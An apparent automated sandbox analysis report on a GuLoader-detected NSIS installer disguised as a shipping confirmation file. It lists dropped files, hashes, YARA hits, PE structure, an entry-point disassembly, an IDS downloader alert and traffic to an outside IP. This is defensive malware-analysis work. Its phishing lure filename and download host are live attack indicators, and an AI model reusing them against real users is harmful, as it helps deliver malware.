SSDEEP:	12288:UnPdM9EEXsp0807Vhc7PWf/EdNjxwxNkecc9waDhWC8muW:EPdM20/77cbc/Ezs9wgtuW
MD5:	DD009056ED546D7CB3B75EF74F748CED
SHA1:	39FA6F07CEAF1D545C02702A18DCACC5C57ACF0A
SHA-256:	BFE72721AD2C670966F0D1A30AF60B5D697731C31AFDD028EE316D32AB2E4E17
SHA-512:	E93E2802C0B8DAB4A384BFDB5D54191438E21D1C7F0228C6F92B0382562D9948869F4EF4610D595E8775556197E4AE68F3E9DC35D6E82495CBC8976655A5AB2B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@..........................0............@.............................................X............................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...................................rsrc...X...........................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Setup.ini

Download File

Process:	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.0536606896881855
Encrypted:	false
SSDEEP:	3:8+dB4WYiTNvn:8AbYiTNvn
MD5:	08CA75DA54EB4810D18796C97F510A55
SHA1:	3D9B020193D16E7D0F5392EF7693A6C5C6D2531D
SHA-256:	E628D2EE9FE054256B42FFDEC449254437949DEB45B13354D515579CE3E0618E
SHA-512:	46D71D69FDCBF9069E74C1176080637A1356E747FA1A1C852172CF0BB36F44ED7D741EB6DF029F333D690E500462DFC9EDEB8B4EB7BB9642C907B792F30DED9A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Bus Clock]..Gats=Galse..

C:\Users\user\AppData\Local\Temp\nsc44DF.tmp

Download File

Process:	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	1220587
Entropy (8bit):	3.8799262547847344
Encrypted:	false
SSDEEP:	12288:JJ140M8PkL4HmWE4RPakcJNrs6/b09tNLTholiuwnwcS9CR:hs4HmJQbq/Q3pJwcF
MD5:	78C44CEEA70B9BEBE79F481544FF3BAF
SHA1:	FBE5188F8BE4D0FB3F46059C2BFA7CDF8FB6EA33
SHA-256:	9C67F421317720FF09E1F94B307B4F1195242F0AD8A559C15119A9C574AE4025
SHA-512:	2DE2E7FD49EF97999DE601B06603FF8A66CF7F403499B87AA601082AE3AA20F31A5B7563839991D9CF765B71B4FEBE68BA4F355372DD2DACB6FED11B0419B56C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nsc44DF.tmp, Author: Joe Security
Reputation:	low
Preview:	@.......,...................V...,...............@...........................................................................................................................................................................................................................................G...Y...........(...j...............................................................................................................................b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.805604762622714
Encrypted:	false
SSDEEP:	192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
MD5:	4ADD245D4BA34B04F213409BFE504C07
SHA1:	EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
SHA-256:	9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
SHA-512:	1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: oXcuapa8Nb, Detection: malicious, Browse Filename: 2afvzKckLw, Detection: malicious, Browse Filename: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, Detection: malicious, Browse Filename: BppG5NgQJB, Detection: malicious, Browse Filename: x6yDsHJ9tr.exe, Detection: malicious, Browse Filename: LrBF2Z930N.exe, Detection: malicious, Browse Filename: 2T10XBqS6g.exe, Detection: malicious, Browse Filename: 2T10XBqS6g.exe, Detection: malicious, Browse Filename: 2T10XBqS6g.exe, Detection: malicious, Browse Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\eftermodnendes\ringeagt\Daystars216.tre

Download File

Process:	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	114454
Entropy (8bit):	1.2519787240577294
Encrypted:	false
SSDEEP:	768:RRDt23AKhN87PfNufvVxTfdx5U5Flf6VAETw:YEevVx2h
MD5:	F85E20AA1A28EEFFC89F744F6B6B67B3
SHA1:	B61AEF131017C5605647983CE2D55769914BB104
SHA-256:	C388ED22B7E44C0C3FDD6D064DD070DCA64CEA1E83D6151566641E7438C346ED
SHA-512:	EA89503F496B30DA5EAA74BB479007BB6B93463B775F16810A4391E79389A219398AC81DCCDD79C3F60E85DF77AA985E405BDF7B477C8F3217ECC3B7460BEE6A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	...............................m.......................5............}.......t......^..................................................)..........................................;......B.......................................................................*....................3.......s.......................+.+...@=.......O..........................G...................M...........g...................#.........................................................................................................v......................e........n......,...................b.................................e.................Y.......=..........................................................a........j.../.........#..........................`..................................>........\..................................... ..................................................g..R.........................................................................g...............................N....................

C:\Users\user\eftermodnendes\ringeagt\Garantis131.Sul

Download File

Process:	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	290864
Entropy (8bit):	7.663951980002321
Encrypted:	false
SSDEEP:	6144:+hJC1Y4BOjiQ5i8Pf8L42QNokpE4RPaMLzcJNrs6EwjcqbPsL4:YJ140M8PkL4HmWE4RPakcJNrs6/b0c
MD5:	C815E5CE90B126450B64ACD9833308BC
SHA1:	D814FCB54B440469BF14C8147F4996C59DECB68D
SHA-256:	B11B281361B8FE3D2FEBB49BE2DF07B72B840EF72C561414B0EE4463F9F105C1
SHA-512:	D5350295726130257F58257B1E8E9B75A29B1EDBE13C158CA25670031395B55E425B052C52F81C04F9F891D7A2F887F732279587A12154FFB8777E4D25FF56AF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\eftermodnendes\ringeagt\Garantis131.Sul, Author: Joe Security
Preview:	......."....................I........]]..o.YY........V.J.......cc...........88..UU...........b.6..........V....i........................7.......\\...................k.e..d................,......i....................]]..........$.............u.......:.......9.....................z..T................[............................../.GG.....................................r........................e..&&&......................OO..................\|........ZZ..........BB..^.......!..........``.......s.++.=.'.X..M.]............................&&....\\................"""""........................n....,,,.NNNNN...........E.../..........1........___....y.....~..........:.....................C.fff..............y................ss...6.`````.....>.##..............f.....@@......ee....;.AA...e.......................JJ.PP..........7..............................77....................[.I.....0.".=..X.<.B..SS....................}......>.....e.I..OO..[.............Q......................))...F............c

C:\Users\user\eftermodnendes\ringeagt\Opvejende.Kej

Download File

Process:	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	217509
Entropy (8bit):	4.607869653006634
Encrypted:	false
SSDEEP:	3072:b30UseFuILs1fuWP7ZzLFv50l8wQcW0O4lAq0lv9fjV+/z6ClGew3:b0oFuIL6uyZcC1Bli/z6wnw3
MD5:	4FCD52C1EA5690576379E0739D4CA668
SHA1:	1F234C97325814923E58D2B59AADED20B01F1246
SHA-256:	34D7CFC019F7EDDAF2FA1B9555BE427FE6CCC091B07089CCFCB7E1D1F2D5C5B0
SHA-512:	3D55BF0FE3D6FC00188E02E9C75FCDBCDE5D1C40E8B182057AE1D4FD25D4B2ADDD9B2CF7F9955095A0955F137DA8EFAD8D979D0A789E7480884FD3979BBE6D8D
Malicious:	false
Preview:	.....mmmm.........GGG......................W.....====..999999.....44.........*..........uu..................q...........NNN.,.Q..==.............r...6.........$..................g..........&&.uu............._...................;......................9...m.......^^^^^.......m..........Q........ee.....L...CC.................s.....................{{....(...............llll.............00......................................jj.bbb..''....-.s..............................QQQ......w.X.....................o...Z...................CC.................@@............'...C.....wwww..c..gg........NN..........pp.....]].PP........~...........gggg............SS..dd...==......DD..................q............zz.................55....V..........L.^.a...R....H...G............l........H..........22..............^.bbb....................T....I...{.............^^.BBBB...V........qqqq.?...............u.MM.-............b.\|\|......ww.........X................<<.WW..mmmm.......o.`....O..J...................W.....

C:\Users\user\eftermodnendes\ringeagt\Skvinge18.alt

Download File

Process:	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	310550
Entropy (8bit):	1.2527719188567612
Encrypted:	false
SSDEEP:	1536:CfvXvtPDO00Rz1DXs2sASdJwvyfnpZkL:klDO0MDRS9k
MD5:	72FA348549D0BD9CE66E5F3EBA54DF3A
SHA1:	D5B4797D07374226CD8173964DF8753F4ABB9E6E
SHA-256:	7F24A44B47D2C036AACE03D4F5EBEA053CED6ED06CE01ED70E6FD8AEE8211CC9
SHA-512:	D375FC28BBA68A52E4C2CB97A9ADA416D38F29B21004F1853DC14ACF28CDE2A802D51FD66901D993DAA58E50D8C87FD2A8827482633B0B9874FF64F8442492B1
Malicious:	false
Preview:	...e......J.........................................................................................................................................J........K...............................L...........................v.............................................................................%..:...................F.................................................................\|...1.....A..................................1........d...................J..X..........................x..............x..."..........................`.........................................................[...................t.......................2..............................................................................t....................................................$...\...............!..........................\|....................................r.............................W.............................................X.....................................................q.................

C:\Users\user\eftermodnendes\ringeagt\bttefulde.tox

Download File

Process:	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8589934592.000000
Category:	dropped
Size (bytes):	267655
Entropy (8bit):	1.2559804952290619
Encrypted:	false
SSDEEP:	768:HbUhrUe+zlum+LaFrAX40edupFSsZVfeTkVhbbCGx6+ZOoJrrSVlRM9k8rZgQWze:ICFg/VP97pb14sZg
MD5:	F6A4342C9271CFFEF29695EEA330941E
SHA1:	291ABCFA507BA730832511E5F47EAA2CB4DFABBD
SHA-256:	605B31C886C5989625152D1CD58BCACF2827DE36CC67B5D94D6B425955CEDBA6
SHA-512:	D839DD8E3D74B7500F32318403BEAC3BA2DA83C48EF21555E78D368AA0404AC750DB1DD7EB8A7196DA32FBE3D880B66ED3166A39F17D8D0D13C9C4B19435530C
Malicious:	false
Preview:	...........T.........'......'....A........s.................@.....................................................................N......M...........^................................t............Q.......R...r.........................................................6..................Q...I........<....d......................................................................................B.....p............/.........................................."...b..@...................Q...........!.................................f............................`.................d.................................L.........f...o....................................................................................s...................i.....................S.b..A...............................................................U..o................................................................../...............................................................................................`..................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.753054968072418
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
File size:	610'289 bytes
MD5:	dd009056ed546d7cb3b75ef74f748ced
SHA1:	39fa6f07ceaf1d545c02702a18dcacc5c57acf0a
SHA256:	bfe72721ad2c670966f0d1a30af60b5d697731c31afdd028ee316d32ab2e4e17
SHA512:	e93e2802c0b8dab4a384bfdb5d54191438e21d1c7f0228c6f92b0382562d9948869f4ef4610d595e8775556197e4ae68f3e9dc35d6e82495cbc8976655a5ab2b
SSDEEP:	12288:UnPdM9EEXsp0807Vhc7PWf/EdNjxwxNkecc9waDhWC8muW:EPdM20/77cbc/Ezs9wgtuW
TLSH:	70D4F1E1F114C2B6E71F4E34E6B269F01D40BC79C1E1483B5390BE9EB47266289AB51F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....

File Icon


Icon Hash:	4571753721719a8d

Static PE Info

General

Entrypoint:	0x403645
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9dda1a1d1f8a1d13ae0297b47046b26e

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A230h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A0h]
mov esi, dword ptr [004080A4h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007FD49862734Ah
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007FD498627318h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429B18h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4a000	0x18858	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x66b7	0x6800	e65344ac983813901119e185754ec24e	False	0.6607196514423077	data	6.4378696011937135	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	bd82d08a08da8783923a22b467699302	False	0.4431640625	data	5.103358601944578	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1fb78	0x600	caa377d001cfc3215a3edff6d7702132	False	0.5091145833333334	data	4.126209888385862	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x20000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4a000	0x18858	0x18a00	73bbe3fdd1585fbd610b24874590b455	False	0.22416322969543148	data	5.2980000367452575	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4a418	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.14908908079971608
RT_ICON	0x5ac40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.27520746887966807
RT_ICON	0x5d1e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3553001876172608
RT_ICON	0x5e290	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.48667377398720685
RT_ICON	0x5f138	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.43934426229508194
RT_ICON	0x5fac0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.569043321299639
RT_ICON	0x60368	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 672	English	United States	0.5552995391705069
RT_ICON	0x60a30	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.18841463414634146
RT_ICON	0x61098	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.4869942196531792
RT_ICON	0x61600	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.598404255319149
RT_ICON	0x61a68	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.26344086021505375
RT_ICON	0x61d50	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 384	English	United States	0.3094262295081967
RT_ICON	0x61f38	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.42905405405405406
RT_DIALOG	0x62060	0x100	data	English	United States	0.5234375
RT_DIALOG	0x62160	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x62280	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x622e0	0xbc	data	English	United States	0.601063829787234
RT_VERSION	0x623a0	0x174	data	English	United States	0.5860215053763441
RT_MANIFEST	0x62518	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-16T05:10:54.309320+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49737	109.99.162.14	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 05:10:52.968060970 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:52.968101978 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:52.968164921 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:52.983092070 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:52.983133078 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:53.999577999 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:53.999649048 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.079523087 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.079557896 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.080610991 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.080679893 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.086669922 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.131337881 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.309278011 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.309340954 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.309350967 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.309371948 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.309403896 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.309451103 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.309463978 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.309508085 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.426955938 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.427170038 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.427897930 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.427989006 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.428915977 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.429099083 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.429697037 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.429883003 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.549184084 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.549374104 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.549885035 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.549972057 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.550600052 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.550673008 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.550729990 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.550806046 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.551511049 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.551582098 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.552393913 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.552462101 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.553205013 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.553282976 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.667556047 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.667730093 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.667871952 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.667871952 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.667902946 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.667957067 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.668034077 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.668113947 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.668546915 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.668620110 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.669110060 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.669178009 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.669692039 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.669764996 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.670032024 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.670104027 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.670615911 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.670686007 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.671257019 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.671329975 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.671380043 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.671444893 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.672336102 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.672409058 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.672436953 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.672502041 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.673135996 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.673207045 CET	49737	443	192.168.2.4	109.99.162.14
